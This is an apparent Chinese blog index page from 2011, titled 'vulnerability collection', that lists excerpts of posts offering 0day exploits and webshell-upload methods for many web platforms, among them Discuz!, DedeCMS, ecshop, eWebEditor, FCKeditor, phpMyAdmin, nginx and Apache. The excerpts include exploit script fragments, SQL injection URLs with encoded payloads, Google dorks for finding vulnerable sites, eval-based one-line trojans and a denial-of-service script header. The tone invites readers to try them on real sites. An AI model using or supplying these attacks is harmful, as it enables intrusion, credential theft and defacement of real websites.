漏洞收集
7禧
这个作者很懒,什么都没留下…
展开
-
Discuz! X2.0 0day EXP
echo "Discuz! X2.0 0day EXP\n";echo "By:Steeltiger \n";echo "php.exe dz2exp.php http://www.xxx.com/ admin\n";if(!empty($argv[1]) &原创 2011-07-05 13:36:36 · 672 阅读 · 0 评论 -
Ewebeditor 2.1.6上传漏洞 UNION运用-直接得SHELL
<br />以前曾进过一个网站,把上传部份的asp代码下载回来研究,当时感觉有漏洞但没仔细研究,还以为那是他们自已写的程序。<br />前几天看到ewebeditor有漏洞的文章才想起那个网站原来用的也是ewebeditor。今天仔细看了看,发现问题了(2.1原创 2011-04-21 20:11:00 · 1209 阅读 · 0 评论 -
DEDEcms GET shell 再次通杀 所有版本
<br />还是上次的那个dede getshell 漏洞 ,只不过官方的补丁没有补到位。<br /><br />现在其基础上,修改图片代码实现最新版本补丁突破。<br />找一张图片,在保留图片代码的同时,插入如下代码<br /><br />复制代码<br原创 2011-03-31 23:07:00 · 1077 阅读 · 0 评论 -
freetextbox最新上传0day
<br /><br />freetextbox跟fckeditor多是国外的一款编辑器。用的还挺多的。<br />基于.NET。<br />漏洞描述:所有版本 没做登陆验证可以直接访问上传木马<br />Freetextbox 3-3-1 可以直接上传任意格式原创 2011-03-25 02:47:00 · 701 阅读 · 0 评论 -
Discuz! 后台拿webshell万能方法
Discuz! 后台拿webshell万能方法:前提条件:要拿到论坛管理员的密码,能够编辑模板文件步骤:1. 找一个空间上传一个wehsehll,注意这个webshell不要让服务器解析,一般使用txt文件就可以了。地址如:http://www.51safe.原创 2011-07-05 13:45:28 · 739 阅读 · 0 评论 -
5UCMS漏洞利用
有一次不小心发现了5UCMS一个小漏洞。漏洞文件后台目录/ajax.asp因未进行后台用户验证,导致未登陆也可访问此文件,文件存在sql注入。我今天进官方看了下好象漏洞他们已经发出了修复公告了,这里我把利用公布出来 直接暴出后台帐号密码。ajax.asp?Ac原创 2011-07-06 02:16:43 · 1140 阅读 · 0 评论 -
syWebEditor编辑器最新0day
syWebEditor编辑器存在上传漏洞,也是解析的问题,跟其它出现这漏洞的 编辑器一样。 exp:http://www.tmdsb.com/syWebEditor/Sel_UploadFile.asp?obj=ProPhoto&fileType=gif%7C原创 2011-07-06 02:11:03 · 490 阅读 · 0 评论 -
DedeCMS 支付页面注入漏洞
发布日期:2011-03.23发布作者:佚名影响版本:dodecms.官方网站:http://www.dedecms.com漏洞类型:SQL注入漏洞描述:DedeCMS. 织梦buy_action.php存在注入,可利用SQL查询代码爆管理员用户密码。漏洞测试原创 2011-07-06 02:13:04 · 1208 阅读 · 0 评论 -
ecshop支付漏洞手工注入 解决方案
原EXP为==========================================respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select 1 from(select count(*原创 2011-07-06 02:57:42 · 912 阅读 · 0 评论 -
最新Discuz! X1- 1.5 exp -2011 dz论坛通杀 0DAY
使用方法 把下面内容保存为exp.php 在php环境下运行 php exp.php===========================================print_r(‘+—————————————————————————+Discuz原创 2011-07-06 02:07:24 · 1303 阅读 · 0 评论 -
杰奇小说连载系统任意文件上传0day
注册用户进入空间-相册-上传用oprea活firefox修改源码 有个*.jpg *.gif的地方改成*。*就能上传任意文件关键字:inurl:modules/space原创 2011-07-06 02:39:01 · 1693 阅读 · 0 评论 -
SDcms后台拿webshell
第一种方法:进入后台-->系统管理-->系统设置-->系统设置->网站名称;把网站名称内容修改为 "%>用菜刀链接http://www.80lr.com/inc/const.asp 就搞定了。第二种方法:进入后台-->系统管理-->系统设置-->系统设置原创 2011-07-06 05:08:05 · 4790 阅读 · 0 评论 -
新云4.0 0day利用方法
访问ask目录,注册用户,在密码问题的地方插入加密后的一句话:┼攠數畣整爠煥敵瑳∨≡┩愾注册成功后连接默认数据库:ask/data/ask_newasp.asa 密码:a原创 2011-07-07 13:17:04 · 1143 阅读 · 0 评论 -
风讯 4.0之前所有版本通杀拿SHELL 0day
直接:/admin/SelectManageDir/FolderImageList.asp?Type=AddFolder&Path=/UploadFile/1.asp//&CurrPath=/UploadFile&ShowVirtualPath=会自己跳转文件管理页面,新建1.a原创 2011-07-08 04:02:32 · 598 阅读 · 0 评论 -
风讯(FoosunCMS) SetNextOptions.asp注入漏洞利用
风讯foosun的注册文件存在漏洞。可以暴管理员帐号和密码。漏洞文件:http://www.dj4now.com/user/SetNextOptions.asp 利用简单的方法:暴管理员帐号:复制代码http://www.dj4now.com/user/Set原创 2011-07-06 02:42:01 · 766 阅读 · 0 评论 -
ECSHOP 搜索变种注射自定义表名猜解方法
search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZS原创 2011-07-10 01:08:06 · 531 阅读 · 0 评论 -
ewebeditor 2.8 后台插上一句话
<br />ewebeditor 2.8 后台插上一句话<br />影响版本:2.8 商业版<br />攻击利用:登陆后台,点击修改密码---新密码设置为 1":eval request("a")’<br />设置成功后,访问asp/config.asp文件即可,一句话木马被写入原创 2011-05-08 01:37:00 · 602 阅读 · 0 评论 -
SQL注入eWebEditor数据库
<br /><br />条件:1、知道ewebeditor数据库的绝对地址<br />2、存在注入,或者后台可执行sql语句。<br />跨库注入:<br />update eWebEditor_Style in ‘E:/webhost/xxxxxxxx/www/admin/Ed原创 2011-03-17 19:03:00 · 632 阅读 · 0 评论 -
Ecshop 漏洞集合
Ecshop 漏洞集合一、EXP:search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWx原创 2011-03-31 23:06:00 · 3197 阅读 · 0 评论 -
卓讯EmteEasySite漏洞+拿webshell方法
卓讯智能化网站管理系统 EmteEasySite官网:http://www.emte.com.cn/百度搜:技术支持:卓讯科技直接进后台看版权是不是EmteEasy系统/main/login.asp漏洞利用:默认数据库地址可下载/db/%23EMTE^@DATEBASE.MDB下原创 2011-07-19 10:51:36 · 1633 阅读 · 0 评论 -
shopxp网上购物系统v7.4最新注入0day
shopxp网上购物系统用的人也算比较多的了,树大招风,当然也经常让人暴0day。这次暴的是7.4的版本,有点老了。不过用的人还很多。大家可以玩玩。洞版本:shopxp网上购物系统 v7.4谷歌关键词:inurl:shopxp_news.asp或者shopxp_news.asp默原创 2011-07-19 10:53:08 · 2115 阅读 · 0 评论 -
phpMyAdmin3.X远程代码执行漏洞0day
phpMyAdmin3.X远程代码执行漏洞php版本exploit。来自t00sl的站长老君。其实前段就有EXP了。听大家说鸡肋的很,当时俺也就没去关注。在说这年头想找到phpMyAdmin的目录是很难的。3.几的版本也碰到的很少。但经过大牛们的研究后,说这个0day其实可以不鸡原创 2011-07-19 10:47:40 · 3072 阅读 · 0 评论 -
PHP 5.3.6缓冲区溢出漏洞POC
杯具这东西也出溢出,不过版本貌似也太高了点吧。现在多用5.1几的吧。呃。TOOLS大牛搞的?有用的拿去玩玩吧!!! /* ** xiaolandjj@qq.com ** http://www.t00ls.net ** 2011-07-1 ** Stack-原创 2011-07-19 10:50:53 · 1461 阅读 · 0 评论 -
ECMall本地文件包含漏洞
简要描述:Ecmall的默认处理中犯了一个严重的错误,绕开了系统中的保护逻辑从而导致可以包含任意文件以php代码执行respond.php 48行$pay_code = !empty($_REQUEST['code']) ? trim($_REQUEST['c原创 2011-09-01 09:19:12 · 897 阅读 · 0 评论 -
通杀IIS7.0畸形解析0day漏洞
找到使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。”)?>原创 2011-09-02 02:55:01 · 2610 阅读 · 0 评论 -
DEDECMS拿SHELL EXP
此漏洞的前提是必须知道后台或plus 目录存在,服务器能外连,就能拿shell因此大家一定要养成使用DEDECM建站时改后台名字的习惯。MYSQL开启外链语句:GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTI原创 2011-09-05 06:58:04 · 980 阅读 · 0 评论 -
dedecms 留言本 XSS 漏洞
dedecms 的 0day 又出来了 呵呵。其实只是xss,结合下社工还是可以拿shell的plus/guestbook/index.php>>>>function init() { document.write(\'Hacked by qing\');}win原创 2011-09-09 09:01:54 · 736 阅读 · 0 评论 -
dedecms织梦暴最新严重0day漏洞
众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。今天小编在群里得到织梦官方论坛某版主可靠消息:“DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。”入侵EXP如下:http://www.tm原创 2011-08-12 21:59:12 · 1313 阅读 · 0 评论 -
ewebeditor PHP 3.8版本上传任意文件0day
PHP版本的ewebeditor用的比ASP版本的少的多吧,俺是非常少碰到。貌似听说国外用的非常多。台湾人喜欢用?用的着的关注一下吧。EXP如下:eWebeditoR3.8 for php任意文件上EXP URL:xxx.com/e原创 2011-08-12 22:05:33 · 1054 阅读 · 0 评论 -
PHP168 V6.02 整站系统远程执行任意代码漏洞利用
漏洞出在 inc/function.inc.php 里面 .get_html_url() 这个函数.inc/function.inc.php:function get_html_url(){ global $rsdb,$aid,$fidDB,$webdb,$fid,$原创 2011-08-13 14:47:53 · 2519 阅读 · 2 评论 -
DEDECMS爆严重安全漏洞免账号密码直接进入后台
众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。今天小编在群里得到织梦官方论坛某版主可靠消息:“DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。”入侵步骤如下:http://www.xx.com/织梦网站后台/login.php原创 2011-08-13 20:04:48 · 1204 阅读 · 0 评论 -
ECSHOP 搜索变种暴用户密码出错的解决办法
遇到一个ECSHOP 利用网上的EXPsearch.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWx原创 2011-08-14 00:33:18 · 615 阅读 · 0 评论 -
Apache httpd 远程拒绝服务
killapache.pl#Apache httpd Remote Denial of Service (memory exhaustion)#By Kingcope#Year 2011## Will result in swapping memory t原创 2011-09-20 14:36:45 · 2358 阅读 · 0 评论 -
FCKeditor编辑器全部版本另类上传漏洞
利用步骤:1.创建一个htaccess文件:代码内容:SetHandler application/x-httpd-php2.实用编辑器上传htaccess文件.http://www.webshell.cc/FCKeditor/editor/f原创 2011-08-30 14:14:04 · 679 阅读 · 0 评论 -
shopxp网上购物系统v7.4爆密码0day
漏洞版本:shopxp网上购物系统 v7.4关键词:inurl:shopxp_news.aspshopxp_news.asp后台shopxp_admin暴密码的语句:/TEXTBOX2.ASP?action=modify&news%69d=122%20and%转载 2011-08-29 05:48:40 · 1484 阅读 · 0 评论 -
PHPWind v7.5 / v8.0漏洞EXP
PHPWind v7.5 / v8.0漏洞EXP 主题关键词:phpwind7.5影响版本:PHPWind v7.5 / v8.0命令 :php pking.php user passhttp://www.xxxx.com/pking.php:复制内容到剪贴板程序代码原创 2011-08-29 05:49:40 · 2963 阅读 · 0 评论 -
ewebeditor的上传结合IIS解析漏洞
google关键字:intext:版权所有:yfcms利用文件:admin\WebEditor\asp\upload.asp利用代码:action=save&type=image&style=popup&cusdir=admin8.asp” method=post原创 2011-08-29 05:51:46 · 769 阅读 · 0 评论 -
nginx的旧版本可能执行任意代码0day
影响版本:0.5.*, 0.6.*, 0.7 这个绝对是大0day哦。非常给力。测试了几个大站。全OK。哈哈。跟上一次那个漏洞有的一比哦。Ngnix在遇到%00空字节时与后端FastCGI处理不一致,导致可以在图片中嵌入PHP代码然后通过访问websh原创 2011-08-30 14:02:00 · 756 阅读 · 0 评论 -
V5shop 8.2版本下通杀注入漏洞
漏洞危害:高危一、漏洞文件:cart.aspx搜索关键词:inurl:scoreindex.aspxexp :/cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name原创 2011-08-30 19:36:28 · 994 阅读 · 0 评论 -
Fckeditor 2.4.2 php任意上传文件漏洞+修补方法
漏洞文件:fckeditor/editor/filemanager/upload/php/upload.php fckeditor/editor/filemanager/upload/php/config.php问题主要是出在config.php文件中未对原创 2011-10-08 17:03:32 · 1908 阅读 · 0 评论